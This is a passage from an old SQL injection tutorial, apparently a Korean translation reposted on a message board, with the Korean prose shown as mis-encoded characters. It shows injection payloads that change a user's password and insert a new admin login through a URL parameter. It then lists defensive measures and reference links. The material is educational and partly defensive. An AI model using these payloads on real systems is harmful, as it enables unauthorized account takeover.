SET 'password' = 'newpas5' WHERE login_name='neo'--

µ¥ÀÌÅÍ º£À̽º ¾È¿¡ »õ·Î¿î ·¹Äڵ带 »ðÀÔÇϱâ À§Çؼ­ :

http://duck/index.asp?id=10; INSERT INTO
'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

¿ì¸®´Â ÀÌÁ¦ ID neo2, Æнº¿öµå newpas5 ·Î ·Î±ä ÇÒ ¼ö °¡ ÀÖ´Ù.



8.0 How to avoid SQL Injection?
============================================
´ÙÀ½°ú °°Àº °æ¿ì¿¡ ¸ðµç ¹®ÀÚ¿­ ¾È¿¡¼­ ½Ì±Û ÄõÆ®, ´õºí ÄõÆ®, ½½·¡½¬, ¹é½½·¡½¬, ¼¼¹Ì ÄÝ·Ð, NULL °°Àº È®ÀåµÈ ¹®ÀÚ, ij¸®Áö ¸®ÅÏ, ´º¶óÀÎ µî°ú °°Àº ¹®ÀÚ¸¦ ÇÊÅ͸µ ÇÑ´Ù¸é :
- »ç¿ëÀÚ·Î ºÎÅÍÀÇ ÀÔ·Â
- URL ¿¡ ÀÖ´Â Æз¯¹ÌÅÍ
- ÄíÅ° ¾È¿¡ ÀÖ´Â °ªµé

¼ýÀÚ °ªÀ» À§Çؼ­ ±×°ÍÀ» SQL ¹®À¸·Î ÆĽÌÀ» ÇϱâÀü¿¡ ±×°ÍÀ» Á¤¼ö·Î º¯È¯Ç϶ó.
¶Ç´Â ±×°ÍÀÌ Á¤¼öÀÎÁö¸¦ È®ÀÎÇϱâ À§Çؼ­ ISNUMERIC ¸¦ »ç¿ëÇ϶ó.

SQL Server Security tab ¾È¿¡¼­ ÇÏÀ§ Ư±Ç »ç¿ëÀÚ¸¦ »ç¿ëÇÏ¿©
"Startup and run SQL Server" ¸¦ º¯È¯ ½ÃÄѶó.

´ç½ÅÀÌ »ç¿ëÇÏÁö ¾Ê´Â ´ÙÀ½ °°Àº ÀúÀåµÈ ÇÁ·Î½ÃÀúµéÀ» »èÁ¦ Ç϶ó :

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask


9.0 Where can I get more info?
============================================
Ãֱٿ츮°¡ ¹ß°ßÇÏ°í SQL Injection À» Àû¿ëÇÑ ÃÖ±Ù ÀÛÇ°µé Áß¿¡ Çϳª´Â PacketStrom À» ¾î¶»°Ô ÇØÅ· Çß´ÂÁö¿¡°üÇÑ Rain Forest Puppy ÀÇ ¹®¼­ÀÌ´Ù.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

ODBC ¿¡·¯ ¸Þ½ÃÁöµé·Î ºÎÅÍ Á¤º¸¸¦ ȹµæÇÏ´Â ¹æ¹ý¿¡ °üÇÑ ¸ÚÁø ¹®¼­°¡ ¿©±â¿¡ ÀÖ´Ù.
blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

¶ÇÇÑ ´Ù¾çÇÑ SQL ¼­¹ö»ó¿¡¼­ SQL Injection ¿¡ °üÇÑ ÈǸ¢ÇÑ ¿ä¾àÁýÀÌ ¿©±â¿¡ ÀÖ´Ù.
http://www.owasp.org/asac/input_validation/sql.shtml

SQL Injection ¿¡ °üÇÑ Senseport ÀÇ ¹®¼­ :
http://www.sensepost.com/misc/SQLinsertion.htm

ÀÐ¾î º¼¸¸ÇÑ ¹®¼­µé:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf



°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2009/11/03 15:56 from 218.38.35.251

  mysqlÀ» ÀÌ¿ëÇÑ root±ÇÇÑ ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ GET,POST method+iframe tag  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡